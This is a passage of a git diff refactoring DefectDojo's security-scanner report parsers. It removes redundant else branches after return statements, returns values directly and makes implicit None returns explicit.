b/dojo/tools/hcl_appscan/parser.py @@ -119,5 +119,4 @@ def get_findings(self, file, test): except UnboundLocalError: pass return findings - else: - return findings + return findings diff --git a/dojo/tools/huskyci/parser.py b/dojo/tools/huskyci/parser.py index 028f4e18453..faa6120b141 100644 --- a/dojo/tools/huskyci/parser.py +++ b/dojo/tools/huskyci/parser.py @@ -20,11 +20,12 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, json_output, test): if json_output is None: - return + return None tree = self.parse_json(json_output) if tree: return self.get_items(tree, test) + return None def parse_json(self, json_output): try: @@ -71,7 +72,7 @@ def get_item(item_node, test): if "securitytool" in item_node: description += "\nSecurity Tool: " + item_node.get("securitytool") - finding = Finding( + return Finding( title=item_node.get("title"), test=test, severity=item_node.get("severity"), @@ -88,5 +89,3 @@ def get_item(item_node, test): dynamic_finding=False, impact="No impact provided", ) - - return finding diff --git a/dojo/tools/hydra/parser.py b/dojo/tools/hydra/parser.py index c42e8637f2e..bbdffa0abe1 100644 --- a/dojo/tools/hydra/parser.py +++ b/dojo/tools/hydra/parser.py @@ -39,9 +39,7 @@ def get_findings(self, json_output, test): report = self.__parse_json(json_output) metadata = HydraScanMetadata(report["generator"]) - findings = self.__extract_findings(report["results"], metadata, test) - - return findings + return self.__extract_findings(report["results"], metadata, test) def __extract_findings( self, raw_findings, metadata: HydraScanMetadata, test, diff --git a/dojo/tools/intsights/parser.py b/dojo/tools/intsights/parser.py index e49c61b852f..74eda25dc80 100644 --- a/dojo/tools/intsights/parser.py +++ b/dojo/tools/intsights/parser.py @@ -29,7 +29,7 @@ def 
_build_finding_description(self, alert: dict) -> str: Returns: A markdown formatted description """ - description = "\n".join( + return "\n".join( [ alert["description"], f'**Date Found**: `{alert.get("report_date", "None provided")} `', @@ -41,7 +41,6 @@ def _build_finding_description(self, alert: dict) -> str: f'**Alert Link**: {alert.get("alert_link", "None provided")}', ], ) - return description def get_findings(self, file, test): duplicates = {} diff --git a/dojo/tools/jfrog_xray_on_demand_binary_scan/parser.py b/dojo/tools/jfrog_xray_on_demand_binary_scan/parser.py index 053df04aa0e..456b23a7330 100644 --- a/dojo/tools/jfrog_xray_on_demand_binary_scan/parser.py +++ b/dojo/tools/jfrog_xray_on_demand_binary_scan/parser.py @@ -66,8 +66,7 @@ def get_references(vulnerability): else: ref += "- " + reference + "\n" return ref - else: - return None + return None def get_remediation(extended_information): @@ -125,8 +124,7 @@ def process_component(component): def get_cve(vulnerability): if "cves" in vulnerability: - cves = vulnerability["cves"] - return cves + return vulnerability["cves"] return [] diff --git a/dojo/tools/kubebench/parser.py b/dojo/tools/kubebench/parser.py index f288da95426..a2263dce841 100644 --- a/dojo/tools/kubebench/parser.py +++ b/dojo/tools/kubebench/parser.py @@ -17,8 +17,7 @@ def get_findings(self, json_output, test): tree = json.load(json_output) if "Controls" in tree: return self.get_chapters(tree["Controls"], test) - else: - return self.get_chapters(tree, test) + return self.get_chapters(tree, test) def get_chapters(self, tree, test): items = [] @@ -105,7 +104,7 @@ def get_item(vuln, test, description): mitigation = vuln.get("remediation", None) vuln_id_from_tool = test_number - finding = Finding( + return Finding( title=title, test=test, description=description, @@ -115,5 +114,3 @@ def get_item(vuln, test, description): static_finding=True, dynamic_finding=False, ) - - return finding diff --git a/dojo/tools/kubescape/parser.py b/dojo/tools/kubescape/parser.py index 877a903db1a..c371f477901 100644 --- a/dojo/tools/kubescape/parser.py +++ b/dojo/tools/kubescape/parser.py @@ -29,12 +29,13 @@ def __hyperlink(link: str) -> str: def severity_mapper(self, input): if input <= 4: return "Low" - elif input <= 7: + if input <= 7: return "Medium" - elif input <= 9: + if input <= 9: return "High" - elif input <= 10: + if input <= 10: return "Critical" + return None def parse_resource_id(self, resource_id): try: diff --git a/dojo/tools/microfocus_webinspect/parser.py b/dojo/tools/microfocus_webinspect/parser.py index 58713a66410..d5a2611f95c 100644 --- a/dojo/tools/microfocus_webinspect/parser.py +++ b/dojo/tools/microfocus_webinspect/parser.py @@ -97,16 +97,15 @@ def get_findings(self, file, test): def convert_severity(val): if val == "0": return "Info" - elif val == "1": + if val == "1": return "Low" - elif val == "2": + if val == "2": return "Medium" - elif val == "3": + if val == "3": return "High" - elif val == "4": + if val == "4": return "Critical" - else: - return "Info" + return "Info" @staticmethod def get_cwe(val): @@ -114,5 +113,4 @@ def get_cwe(val): cweSearch = re.search("CWE-(\\d+)", val, re.IGNORECASE) if cweSearch: return int(cweSearch.group(1)) - else: - return 0 + return 0 diff --git a/dojo/tools/mobsf/parser.py b/dojo/tools/mobsf/parser.py index 9e8ccf91029..b86d7bf041b 100644 --- a/dojo/tools/mobsf/parser.py +++ b/dojo/tools/mobsf/parser.py @@ -378,8 +378,7 @@ def getSeverityForPermission(self, status): """ if "dangerous" == status: return "High" - else: - 
return "Info" + return "Info" # Criticality rating def getCriticalityRating(self, rating): diff --git a/dojo/tools/mobsfscan/parser.py b/dojo/tools/mobsfscan/parser.py index ae7eecc1224..bd9fd5167a3 100644 --- a/dojo/tools/mobsfscan/parser.py +++ b/dojo/tools/mobsfscan/parser.py @@ -29,53 +29,52 @@ def get_findings(self, filename, test): data = json.load(filename) if len(data.get("results")) == 0: return [] - else: - dupes = {} - for key, item in data.get("results").items(): - metadata = item.get("metadata") - cwe = int( - re.match(r"(cwe|CWE)-([0-9]+)", metadata.get("cwe")).group( - 2, - ), - ) - masvs = metadata.get("masvs") - owasp_mobile = metadata.get("owasp-mobile") - description = "\n".join( - [ - f"**Description:** `{metadata.get('description')}`", - f"**OWASP MASVS:** `{masvs}`", - f"**OWASP Mobile:** `{owasp_mobile}`", - ], - ) - references = metadata.get("reference") - if metadata.get("severity") in self.SEVERITY: - severity = self.SEVERITY[metadata.get("severity")] - else: - severity = "Info" + dupes = {} + for key, item in data.get("results").items(): + metadata = item.get("metadata") + cwe = int( + re.match(r"(cwe|CWE)-([0-9]+)", metadata.get("cwe")).group( + 2, + ), + ) + masvs = metadata.get("masvs") + owasp_mobile = metadata.get("owasp-mobile") + description = "\n".join( + [ + f"**Description:** `{metadata.get('description')}`", + f"**OWASP MASVS:** `{masvs}`", + f"**OWASP Mobile:** `{owasp_mobile}`", + ], + ) + references = metadata.get("reference") + if metadata.get("severity") in self.SEVERITY: + severity = self.SEVERITY[metadata.get("severity")] + else: + severity = "Info" - finding = Finding( - title=f"{key}", - test=test, - severity=severity, - nb_occurences=1, - cwe=cwe, - description=description, - references=references, - ) - if item.get("files"): - for file in item.get("files"): - file_path = file.get("file_path") - line = file.get("match_lines")[0] - finding.file_path = file_path - finding.line = line + finding = Finding( + title=f"{key}", + test=test, + severity=severity, + nb_occurences=1, + cwe=cwe, + description=description, + references=references, + ) + if item.get("files"): + for file in item.get("files"): + file_path = file.get("file_path") + line = file.get("match_lines")[0] + finding.file_path = file_path + finding.line = line - dupe_key = hashlib.sha256( - (key + str(cwe) + masvs + owasp_mobile).encode("utf-8"), - ).hexdigest() + dupe_key = hashlib.sha256( + (key + str(cwe) + masvs + owasp_mobile).encode("utf-8"), + ).hexdigest() - if dupe_key in dupes: - finding = dupes[dupe_key] - finding.nb_occurences += 1 - else: - dupes[dupe_key] = finding - return list(dupes.values()) + if dupe_key in dupes: + finding = dupes[dupe_key] + finding.nb_occurences += 1 + else: + dupes[dupe_key] = finding + return list(dupes.values()) diff --git a/dojo/tools/mozilla_observatory/parser.py b/dojo/tools/mozilla_observatory/parser.py index 783e0ada6f2..19e4c7febd7 100644 --- a/dojo/tools/mozilla_observatory/parser.py +++ b/dojo/tools/mozilla_observatory/parser.py @@ -61,9 +61,8 @@ def get_findings(self, file, test): def get_severity(self, num_severity): if 0 > num_severity >= -10: return "Low" - elif -11 >= num_severity > -26: + if -11 >= num_severity > -26: return "Medium" - elif num_severity <= -26: + if num_severity <= -26: return "High" - else: - return "Info" + return "Info" diff --git a/dojo/tools/ms_defender/parser.py b/dojo/tools/ms_defender/parser.py index 07cf6de4049..ccf348cb468 100644 --- a/dojo/tools/ms_defender/parser.py +++ 
b/dojo/tools/ms_defender/parser.py @@ -34,29 +34,28 @@ def get_findings(self, file, test): zipdata = {name: input_zip.read(name) for name in input_zip.namelist()} if zipdata.get("machines/") is None or zipdata.get("vulnerabilities/") is None: return [] - else: - vulnerabilityfiles = [] - machinefiles = [] - for content in list(zipdata): - if "vulnerabilities/" in content and "vulnerabilities/" != content: - vulnerabilityfiles.append(content) - if "machines/" in content and "machines/" != content: - machinefiles.append(content) - vulnerabilities = [] - machines = {} - for vulnerabilityfile in vulnerabilityfiles: - output = json.loads(zipdata[vulnerabilityfile].decode("ascii"))["value"] - for data in output: - vulnerabilities.append(data) - for machinefile in machinefiles: - output = json.loads(zipdata[machinefile].decode("ascii"))["value"] - for data in output: - machines[data.get("id")] = data - for vulnerability in vulnerabilities: - try: - self.process_zip(vulnerability, machines[vulnerability["machineId"]]) - except (IndexError, KeyError): - self.process_json(vulnerability) + vulnerabilityfiles = [] + machinefiles = [] + for content in list(zipdata): + if "vulnerabilities/" in content and "vulnerabilities/" != content: + vulnerabilityfiles.append(content) + if "machines/" in content and "machines/" != content: + machinefiles.append(content) + vulnerabilities = [] + machines = {} + for vulnerabilityfile in vulnerabilityfiles: + output = json.loads(zipdata[vulnerabilityfile].decode("ascii"))["value"] + for data in output: + vulnerabilities.append(data) + for machinefile in machinefiles: + output = json.loads(zipdata[machinefile].decode("ascii"))["value"] + for data in output: + machines[data.get("id")] = data + for vulnerability in vulnerabilities: + try: + self.process_zip(vulnerability, machines[vulnerability["machineId"]]) + except (IndexError, KeyError): + self.process_json(vulnerability) else: return [] return self.findings @@ -141,5 +140,4 @@ def process_zip(self, vulnerability, machine): def severity_check(self, input): if input in ["Informational", "Low", "Medium", "High", "Critical"]: return input - else: - return "Informational" + return "Informational" diff --git a/dojo/tools/neuvector/parser.py b/dojo/tools/neuvector/parser.py index 7cf278ce7e3..468f4104a03 100644 --- a/dojo/tools/neuvector/parser.py +++ b/dojo/tools/neuvector/parser.py @@ -116,16 +116,15 @@ def get_item(vulnerability, test): def convert_severity(severity): if severity.lower() == "critical": return "Critical" - elif severity.lower() == "high": + if severity.lower() == "high": return "High" - elif severity.lower() == "medium": + if severity.lower() == "medium": return "Medium" - elif severity.lower() == "low": + if severity.lower() == "low": return "Low" - elif severity == "": + if severity == "": return "Info" - else: - return severity.title() + return severity.title() class NeuVectorParser: @@ -144,6 +143,5 @@ def get_findings(self, filename, test): if filename.name.lower().endswith(".json"): return NeuVectorJsonParser().parse(filename, test) - else: - msg = "Unknown File Format" - raise ValueError(msg) + msg = "Unknown File Format" + raise ValueError(msg) diff --git a/dojo/tools/neuvector_compliance/parser.py b/dojo/tools/neuvector_compliance/parser.py index adf05d0729d..b3bd18bf6cf 100644 --- a/dojo/tools/neuvector_compliance/parser.py +++ b/dojo/tools/neuvector_compliance/parser.py @@ -101,7 +101,7 @@ def get_item(node, test): for m in messages: full_description += f"{str(m).rstrip()}\n" - finding = 
Finding( + return Finding( title=title, test=test, description=full_description, @@ -112,25 +112,22 @@ def get_item(node, test): dynamic_finding=False, ) - return finding - # see neuvector/share/clus_apis.go def convert_severity(severity): if severity.lower() == "high": return "High" - elif severity.lower() == "warn": + if severity.lower() == "warn": return "Medium" - elif severity.lower() == "info": + if severity.lower() == "info": return "Low" - elif severity.lower() == "pass": + if severity.lower() == "pass": return "Info" - elif severity.lower() == "note": + if severity.lower() == "note": return "Info" - elif severity.lower() == "error": + if severity.lower() == "error": return "Info" - else: - return severity.title() + return severity.title() class NeuVectorComplianceParser: @@ -149,6 +146,5 @@ def get_findings(self, filename, test): if filename.name.lower().endswith(".json"): return parse(filename, test) - else: - msg = "Unknown File Format" - raise ValueError(msg) + msg = "Unknown File Format" + raise ValueError(msg) diff --git a/dojo/tools/nikto/parser.py b/dojo/tools/nikto/parser.py index 57908f3d5db..c3d332d29c3 100644 --- a/dojo/tools/nikto/parser.py +++ b/dojo/tools/nikto/parser.py @@ -27,8 +27,7 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, filename, test): if filename.name.lower().endswith(".xml"): return NiktoXMLParser().process_xml(filename, test) - elif filename.name.lower().endswith(".json"): + if filename.name.lower().endswith(".json"): return NiktoJSONParser().process_json(filename, test) - else: - msg = "Unknown File Format" - raise ValueError(msg) + msg = "Unknown File Format" + raise ValueError(msg) diff --git a/dojo/tools/nmap/parser.py b/dojo/tools/nmap/parser.py index 5e101f2bb9f..f1a62892c69 100644 --- a/dojo/tools/nmap/parser.py +++ b/dojo/tools/nmap/parser.py @@ -146,14 +146,13 @@ def convert_cvss_score(self, raw_value): val = float(raw_value) if val == 0.0: return "Info" - elif val < 4.0: + if val < 4.0: return "Low" - elif val < 7.0: + if val < 7.0: return "Medium" - elif val < 9.0: + if val < 9.0: return "High" - else: - return "Critical" + return "Critical" def manage_vulner_script( self, test, dupes, script_element, endpoint, report_date=None, diff --git a/dojo/tools/noseyparker/parser.py b/dojo/tools/noseyparker/parser.py index 8c4a80190d5..aa35489a657 100644 --- a/dojo/tools/noseyparker/parser.py +++ b/dojo/tools/noseyparker/parser.py @@ -29,8 +29,8 @@ def get_findings(self, file, test): # Turn JSONL file into DataFrame if file is None: - return - elif file.name.lower().endswith(".jsonl"): + return None + if file.name.lower().endswith(".jsonl"): # Process JSON lines into Dict data = [json.loads(line) for line in file] diff --git a/dojo/tools/npm_audit/parser.py b/dojo/tools/npm_audit/parser.py index fc07e281007..f5143f72af3 100644 --- a/dojo/tools/npm_audit/parser.py +++ b/dojo/tools/npm_audit/parser.py @@ -24,7 +24,7 @@ def get_findings(self, json_output, test): def parse_json(self, json_output): if json_output is None: - return + return None try: data = json_output.read() try: @@ -46,9 +46,7 @@ def parse_json(self, json_output): msg = "npm audit report contains errors: %s, %s" raise ValueError(msg, code, summary) - subtree = tree.get("advisories") - - return subtree + return tree.get("advisories") def get_items(self, tree, test): items = {} diff --git a/dojo/tools/npm_audit_7_plus/parser.py b/dojo/tools/npm_audit_7_plus/parser.py index 65b78b4052c..88198844a04 100644 --- a/dojo/tools/npm_audit_7_plus/parser.py +++ 
b/dojo/tools/npm_audit_7_plus/parser.py @@ -44,7 +44,7 @@ def get_findings(self, json_output, test): def parse_json(self, json_output): """Parse the json format to get findings.""" if json_output is None: - return + return None try: data = json_output.read() try: diff --git a/dojo/tools/nsp/parser.py b/dojo/tools/nsp/parser.py index 0b4da91c4e4..466ed6dfa60 100644 --- a/dojo/tools/nsp/parser.py +++ b/dojo/tools/nsp/parser.py @@ -17,8 +17,7 @@ def get_findings(self, json_output, test): tree = self.parse_json(json_output) if tree: return self.get_items(tree, test) - else: - return [] + return [] def parse_json(self, json_output): try: @@ -56,7 +55,7 @@ def get_item(item_node, test): else: severity = "Critical" - finding = Finding( + return Finding( title=item_node["title"] + " - " + "(" @@ -89,5 +88,3 @@ def get_item(item_node, test): mitigated=None, impact="No impact provided", ) - - return finding diff --git a/dojo/tools/nuclei/parser.py b/dojo/tools/nuclei/parser.py index dc79eacaf65..4c843c6dca1 100644 --- a/dojo/tools/nuclei/parser.py +++ b/dojo/tools/nuclei/parser.py @@ -33,7 +33,7 @@ def get_findings(self, filename, test): data = [] if filecontent == "" or len(filecontent) == 0: return [] - elif filecontent[0] == "[": + if filecontent[0] == "[": content = json.loads(filecontent) for template in content: data.append(template) diff --git a/dojo/tools/openvas/csv_parser.py b/dojo/tools/openvas/csv_parser.py index 4d3011d82f9..c93a411bc92 100644 --- a/dojo/tools/openvas/csv_parser.py +++ b/dojo/tools/openvas/csv_parser.py @@ -21,10 +21,9 @@ def map_column_value(self, finding, column_value): def evaluate_bool_value(column_value): if column_value.lower() == "true": return True - elif column_value.lower() == "false": + if column_value.lower() == "false": return False - else: - return None + return None def process_column(self, column_name, column_value, finding): if ( diff --git a/dojo/tools/openvas/parser.py b/dojo/tools/openvas/parser.py index a103a4d8921..9f366c17694 100644 --- a/dojo/tools/openvas/parser.py +++ b/dojo/tools/openvas/parser.py @@ -15,5 +15,6 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, filename, test): if str(filename.name).endswith(".csv"): return OpenVASCSVParser().get_findings(filename, test) - elif str(filename.name).endswith(".xml"): + if str(filename.name).endswith(".xml"): return OpenVASXMLParser().get_findings(filename, test) + return None diff --git a/dojo/tools/openvas/xml_parser.py b/dojo/tools/openvas/xml_parser.py index bd9d365e0da..32b7d001ca9 100644 --- a/dojo/tools/openvas/xml_parser.py +++ b/dojo/tools/openvas/xml_parser.py @@ -50,11 +50,10 @@ def convert_cvss_score(self, raw_value): val = float(raw_value) if val == 0.0: return "Info" - elif val < 4.0: + if val < 4.0: return "Low" - elif val < 7.0: + if val < 7.0: return "Medium" - elif val < 9.0: + if val < 9.0: return "High" - else: - return "Critical" + return "Critical" diff --git a/dojo/tools/ort/parser.py b/dojo/tools/ort/parser.py index f314365ed88..9f0927bd1cf 100644 --- a/dojo/tools/ort/parser.py +++ b/dojo/tools/ort/parser.py @@ -24,8 +24,7 @@ def get_findings(self, json_output, test): evaluated_model = self.parse_json(json_output) if evaluated_model: return self.get_items(evaluated_model, test) - else: - return [] + return [] def parse_json(self, json_output): try: @@ -78,17 +77,14 @@ def is_rule_violation_unresolved(rule_violation): def find_in_dependency_tree(tree, package_id): if "pkg" in tree and tree["pkg"] == package_id: return True - else: - if "children" 
in tree: - found_in_child = False - for child in tree["children"]: - if found_in_child: - break - else: - found_in_child = find_in_dependency_tree(child, package_id) - return found_in_child - else: - return False + if "children" in tree: + found_in_child = False + for child in tree["children"]: + if found_in_child: + break + found_in_child = find_in_dependency_tree(child, package_id) + return found_in_child + return False def get_project_ids_for_package(dependency_trees, package_id): @@ -172,7 +168,7 @@ def get_item(model, test): severity = get_severity(model.rule_violation) - finding = Finding( + return Finding( title=model.rule_violation["rule"], test=test, references=model.rule_violation["message"], @@ -181,8 +177,6 @@ def get_item(model, test): static_finding=True, ) - return finding - # TODO: with python 3.7 # @dataclass @@ -200,9 +194,8 @@ def get_item(model, test): def get_severity(rule_violation): if rule_violation["severity"] == "ERROR": return "High" - elif rule_violation["severity"] == "WARNING": + if rule_violation["severity"] == "WARNING": return "Medium" - elif rule_violation["severity"] == "HINT": + if rule_violation["severity"] == "HINT": return "Info" - else: - return "Critical" + return "Critical" diff --git a/dojo/tools/ossindex_devaudit/parser.py b/dojo/tools/ossindex_devaudit/parser.py index ed89887e29c..95ddb102d26 100644 --- a/dojo/tools/ossindex_devaudit/parser.py +++ b/dojo/tools/ossindex_devaudit/parser.py @@ -24,8 +24,7 @@ def get_findings(self, json_file, test): if tree: return list(self.get_items(tree, test)) - else: - return [] + return [] def parse_json(self, json_file): if json_file is None: @@ -71,7 +70,7 @@ def get_item( msg = "Attempting to convert the CWE value to an integer failed" raise ValueError(msg) - finding = Finding( + return Finding( title=dependency_source + ":" + dependency_name @@ -97,8 +96,6 @@ def get_item( impact="No impact provided by scan", ) - return finding - def get_severity(cvss_score): result = "Info" diff --git a/dojo/tools/php_security_audit_v2/parser.py b/dojo/tools/php_security_audit_v2/parser.py index e677e252545..674f35f44c8 100644 --- a/dojo/tools/php_security_audit_v2/parser.py +++ b/dojo/tools/php_security_audit_v2/parser.py @@ -73,9 +73,8 @@ def get_severity_word(severity): if sev == 5: return "Critical" - elif sev == 4: + if sev == 4: return "High" - elif sev == 3: + if sev == 3: return "Medium" - else: - return "Low" + return "Low" diff --git a/dojo/tools/php_symfony_security_check/parser.py b/dojo/tools/php_symfony_security_check/parser.py index e3788759c7d..2fd2cace6ba 100644 --- a/dojo/tools/php_symfony_security_check/parser.py +++ b/dojo/tools/php_symfony_security_check/parser.py @@ -19,7 +19,7 @@ def get_findings(self, json_file, test): def parse_json(self, json_file): if json_file is None: - return + return None try: data = json_file.read() try: diff --git a/dojo/tools/popeye/parser.py b/dojo/tools/popeye/parser.py index e3806c6f8d7..78c516a1b44 100644 --- a/dojo/tools/popeye/parser.py +++ b/dojo/tools/popeye/parser.py @@ -78,15 +78,13 @@ def get_findings(self, file, test): def get_popeye_level_string(self, level): if level == 1: return "Info" - elif level == 2: + if level == 2: return "Warning" - else: - return "Error" + return "Error" def get_defect_dojo_severity(self, level): if level == 1: return "Info" - elif level == 2: + if level == 2: return "Low" - else: - return "High" + return "High" diff --git a/dojo/tools/pwn_sast/parser.py b/dojo/tools/pwn_sast/parser.py index d66afa35127..dac79b67d95 100644 --- 
a/dojo/tools/pwn_sast/parser.py +++ b/dojo/tools/pwn_sast/parser.py @@ -119,3 +119,4 @@ def get_findings(self, filename, test): findings[unique_finding_key] = finding return list(findings.values()) + return None diff --git a/dojo/tools/qualys/csv_parser.py b/dojo/tools/qualys/csv_parser.py index 16ad062fc69..2f88814b447 100644 --- a/dojo/tools/qualys/csv_parser.py +++ b/dojo/tools/qualys/csv_parser.py @@ -28,9 +28,7 @@ def parse_csv(csv_file) -> [Finding]: ) report_findings = get_report_findings(csv_reader) - dojo_findings = build_findings_from_dict(report_findings) - - return dojo_findings + return build_findings_from_dict(report_findings) def get_report_findings(csv_reader) -> [dict]: @@ -93,6 +91,7 @@ def _extract_cvss_vectors(cvss_base, cvss_temporal): ) return cvss_vector + return None def _clean_cve_data(cve_string: str) -> list: @@ -131,8 +130,7 @@ def get_severity(value: str) -> str: if settings.USE_QUALYS_LEGACY_SEVERITY_PARSING: return legacy_severity_lookup.get(value, "Info") - else: - return qualys_severity_lookup.get(value, "Info") + return qualys_severity_lookup.get(value, "Info") def build_findings_from_dict(report_findings: [dict]) -> [Finding]: diff --git a/dojo/tools/qualys/parser.py b/dojo/tools/qualys/parser.py index ade88d2d325..96f14a9441b 100644 --- a/dojo/tools/qualys/parser.py +++ b/dojo/tools/qualys/parser.py @@ -310,5 +310,4 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, file, test): if file.name.lower().endswith(".csv"): return csv_parser.parse_csv(file) - else: - return qualys_parser(file) + return qualys_parser(file) diff --git a/dojo/tools/qualys_infrascan_webgui/parser.py b/dojo/tools/qualys_infrascan_webgui/parser.py index f252e7d5414..2d26eeafc06 100644 --- a/dojo/tools/qualys_infrascan_webgui/parser.py +++ b/dojo/tools/qualys_infrascan_webgui/parser.py @@ -114,16 +114,15 @@ def qualys_convert_severity(raw_val): val = str(raw_val).strip() if "1" == val: return "Info" - elif "2" == val: + if "2" == val: return "Low" - elif "3" == val: + if "3" == val: return "Medium" - elif "4" == val: + if "4" == val: return "High" - elif "5" == val: + if "5" == val: return "Critical" - else: - return "Info" + return "Info" class QualysInfrascanWebguiParser: diff --git a/dojo/tools/qualys_webapp/parser.py b/dojo/tools/qualys_webapp/parser.py index 59c0d2b855c..9565f1dd1ee 100644 --- a/dojo/tools/qualys_webapp/parser.py +++ b/dojo/tools/qualys_webapp/parser.py @@ -37,8 +37,7 @@ def get_cwe(cwe): cweSearch = re.search("CWE-([0-9]*)", cwe, re.IGNORECASE) if cweSearch: return cweSearch.group(1) - else: - return 0 + return 0 def attach_unique_extras( @@ -171,8 +170,7 @@ def decode_tag(tag): if tag is not None: if tag.get("base64") == "true": return base64.b64decode(tag.text).decode("utf8", "replace") - else: - return tag.text + return tag.text return "" diff --git a/dojo/tools/retirejs/parser.py b/dojo/tools/retirejs/parser.py index 4cb162e8a42..edbda16a87f 100644 --- a/dojo/tools/retirejs/parser.py +++ b/dojo/tools/retirejs/parser.py @@ -62,7 +62,7 @@ def get_item(self, item_node, test, file): elif "osvdb" in item_node["identifiers"]: title = "".join(item_node["identifiers"]["osvdb"]) - finding = Finding( + return Finding( title=title, test=test, cwe=1035, # Vulnerable Third Party Component @@ -74,5 +74,3 @@ def get_item(self, item_node, test, file): duplicate=False, out_of_scope=False, ) - - return finding diff --git a/dojo/tools/risk_recon/parser.py b/dojo/tools/risk_recon/parser.py index 30c08e5161e..4ddcf64e16c 100644 --- 
a/dojo/tools/risk_recon/parser.py +++ b/dojo/tools/risk_recon/parser.py @@ -36,6 +36,7 @@ def get_findings(self, filename, test): findings = data.get("findings") return self._get_findings_internal(findings, test) + return None def _get_findings_internal(self, findings, test): dupes = {} diff --git a/dojo/tools/rusty_hog/parser.py b/dojo/tools/rusty_hog/parser.py index fa2a4f6ebc2..a4582106f0d 100644 --- a/dojo/tools/rusty_hog/parser.py +++ b/dojo/tools/rusty_hog/parser.py @@ -19,8 +19,7 @@ def get_findings(self, json_output, test): return self.get_items(tree, test) def parse_json(self, json_output): - tree = json.load(json_output) - return tree + return json.load(json_output) def get_items(self, json_output, scanner, test): items = {} @@ -79,7 +78,7 @@ def __getitem(self, vulnerabilities, scanner): for vulnerability in vulnerabilities: if scanner == "Rusty Hog": break - elif scanner == "Choctaw Hog": + if scanner == "Choctaw Hog": """Choctaw Hog""" found_secret_string = vulnerability.get("stringsFound") description = f"**This string was found:** {found_secret_string}" diff --git a/dojo/tools/sarif/parser.py b/dojo/tools/sarif/parser.py index b707205f9fe..eb83977f0c9 100644 --- a/dojo/tools/sarif/parser.py +++ b/dojo/tools/sarif/parser.py @@ -146,9 +146,9 @@ def get_message_from_multiformatMessageString(data, rule): text = text.replace(substitution_str, arguments[i]) else: return text - else: - # TODO: manage markdown - return data.get("text") + return None + # TODO: manage markdown + return data.get("text") def cve_try(val): @@ -156,8 +156,7 @@ def cve_try(val): cveSearch = re.search("(CVE-[0-9]+-[0-9]+)", val, re.IGNORECASE) if cveSearch: return cveSearch.group(1).upper() - else: - return None + return None def get_title(result, rule): @@ -327,14 +326,13 @@ def cvss_to_severity(cvss): if cvss >= 9: return severity_mapping.get(5) - elif cvss >= 7: + if cvss >= 7: return severity_mapping.get(4) - elif cvss >= 4: + if cvss >= 4: return severity_mapping.get(3) - elif cvss > 0: + if cvss > 0: return severity_mapping.get(2) - else: - return severity_mapping.get(1) + return severity_mapping.get(1) def get_severity(result, rule): @@ -346,12 +344,11 @@ def get_severity(result, rule): if "note" == severity: return "Info" - elif "warning" == severity: + if "warning" == severity: return "Medium" - elif "error" == severity: + if "error" == severity: return "High" - else: - return "Medium" + return "Medium" def get_item(result, rules, artifacts, run_date): diff --git a/dojo/tools/scout_suite/parser.py b/dojo/tools/scout_suite/parser.py index 45dd1dbdf0c..a95b91dcd02 100644 --- a/dojo/tools/scout_suite/parser.py +++ b/dojo/tools/scout_suite/parser.py @@ -150,8 +150,7 @@ def __get_items(self, data): def formatview(self, depth): if depth > 1: return "* " - else: - return "" + return "" def recursive_print(self, src, depth=0, key=""): def tabs(n): diff --git a/dojo/tools/semgrep/parser.py b/dojo/tools/semgrep/parser.py index aa4f7307503..a9afb107426 100644 --- a/dojo/tools/semgrep/parser.py +++ b/dojo/tools/semgrep/parser.py @@ -132,15 +132,14 @@ def get_findings(self, filename, test): def convert_severity(self, val): if "CRITICAL" == val.upper(): return "Critical" - elif "WARNING" == val.upper(): + if "WARNING" == val.upper(): return "Medium" - elif "ERROR" == val.upper() or "HIGH" == val.upper(): + if "ERROR" == val.upper() or "HIGH" == val.upper(): return "High" - elif "INFO" == val.upper(): + if "INFO" == val.upper(): return "Info" - else: - msg = f"Unknown value for severity: {val}" - raise 
ValueError(msg) + msg = f"Unknown value for severity: {val}" + raise ValueError(msg) def get_description(self, item): description = "" diff --git a/dojo/tools/snyk/parser.py b/dojo/tools/snyk/parser.py index 4d1a0e89437..634a16df73b 100644 --- a/dojo/tools/snyk/parser.py +++ b/dojo/tools/snyk/parser.py @@ -23,8 +23,7 @@ def get_findings(self, json_output, test): for moduleTree in reportTree: temp += self.process_tree(moduleTree, test) return temp - else: - return self.process_tree(reportTree, test) + return self.process_tree(reportTree, test) def process_tree(self, tree, test): return list(self.get_items(tree, test)) if tree else [] @@ -238,7 +237,7 @@ def get_code_item(self, vulnerability, test): else: severity = "Critical" # create the finding object - finding = Finding( + return Finding( title=ruleId + "_" + locations_uri, test=test, severity=severity, @@ -259,4 +258,3 @@ def get_code_item(self, vulnerability, test): static_finding=True, dynamic_finding=False, ) - return finding diff --git a/dojo/tools/snyk_code/parser.py b/dojo/tools/snyk_code/parser.py index a35b37251cf..875e49e006e 100644 --- a/dojo/tools/snyk_code/parser.py +++ b/dojo/tools/snyk_code/parser.py @@ -23,8 +23,7 @@ def get_findings(self, json_output, test): for moduleTree in reportTree: temp += self.process_tree(moduleTree, test) return temp - else: - return self.process_tree(reportTree, test) + return self.process_tree(reportTree, test) def process_tree(self, tree, test): return list(self.get_items(tree, test)) if tree else [] @@ -235,7 +234,7 @@ def get_code_item(self, vulnerability, test): else: severity = "Critical" # create the finding object - finding = Finding( + return Finding( vuln_id_from_tool=ruleId, file_path=locations_uri, title=ruleId + "_" + locations_uri, @@ -258,4 +257,3 @@ def get_code_item(self, vulnerability, test): static_finding=True, dynamic_finding=False, ) - return finding diff --git a/dojo/tools/sonarqube/parser.py b/dojo/tools/sonarqube/parser.py index b06a7e83fad..efba2488e9d 100644 --- a/dojo/tools/sonarqube/parser.py +++ b/dojo/tools/sonarqube/parser.py @@ -27,18 +27,16 @@ def get_label_for_scan_types(self, scan_type): def get_description_for_scan_types(self, scan_type): if scan_type == "SonarQube Scan": return "Aggregates findings per cwe, title, description, file_path. SonarQube output file can be imported in HTML format or JSON format. You can get the JSON output directly if you use the SonarQube API or generate with https://github.com/soprasteria/sonar-report version >= 1.1.0, recommend version >= 3.1.2" - else: - return "Import all findings from sonarqube html report or JSON format. SonarQube output file can be imported in HTML format or JSON format. Generate with https://github.com/soprasteria/sonar-report version >= 1.1.0, recommend version >= 3.1.2" + return "Import all findings from sonarqube html report or JSON format. SonarQube output file can be imported in HTML format or JSON format. 
Generate with https://github.com/soprasteria/sonar-report version >= 1.1.0, recommend version >= 3.1.2"
 
     def get_findings(self, file, test):
         if file.name.endswith(".json"):
             json_content = json.load(file)
